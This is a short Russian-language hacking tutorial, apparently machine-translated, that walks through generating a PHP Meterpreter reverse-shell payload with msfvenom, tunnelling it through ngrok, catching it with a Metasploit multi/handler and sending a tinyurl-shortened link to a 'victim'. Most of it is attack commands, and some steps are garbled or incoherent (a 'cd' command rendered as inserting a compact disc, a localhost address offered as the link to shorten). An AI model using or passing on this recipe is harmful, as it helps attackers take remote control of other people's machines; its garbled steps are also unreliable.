Взлом с помощью полезных нагрузок PHP и ngrok

Взлом с помощью полезных нагрузок PHP и ngrok

Этичный Хакер

Шаг 1: Установка ngrok

Пожалуйста, следуйте инструкциям по установке ngrok.

Давайте начнем с загрузки ngrok. Скачать ngrok можно здесь https://ngrok.com/download.

После завершения загрузки ngrok извлеките Zip-архив, а затем вставьте в него компакт-диск, например “cd ngrok”

cd ngrok

Установите свой authtoken (ниже приведен пример кода аутентификации, копирующий токен аутентификации из ngrok.com учетная запись.Скопируйте код аутентификации из своей учетной записи в ngrok.com мы будем использовать это для аутентификации нашего туннеля. Вы можете сделать это, перейдя в папку, где хранится ngrok, и используя .”/ngrok authtoken yourauthtokenhere ” Код аутентификации будет сохранен.

Пример:

./ngrok authtoken UHTsJVmnmrninfibyuvtc_2b9xscccvdvdfsaq8f7z3

Теперь мы создадим безопасный TCP-туннель. Откройте новый терминал и введите ngrok tcp 4545, измените номер порта на любой порт, который вы хотели бы использовать.

Шаг 2: Создание полезной нагрузки PHP

Теперь мы будем использовать msfvenom для создания полезной нагрузки PHP.

Откройте новый командный терминал, введите команду ниже, измените LPORT на порт, который вы указали при запуске ngrok.

 msfvenom -p php/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LПОРТ=17928 R > home.php

Шаг 3: запуск multi/handler

В новом командном терминале введите команды

service postgresql start
service apache2 start

 

Введите приведенные ниже команды в терминал.

use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 127.0.0.1
set lport 17928

Скопируйте файл php в /var/www/html

Введите эксплойт в терминале msfconsole.

Шаг 4: сократите URL

Перейти к tinyurl.com и сократите URL-адрес.

Например, 127.0.0.1:17928

 

Отправьте сокращенную крошечную URL-ссылку жертве, так как мы работаем в локальной среде



Report Page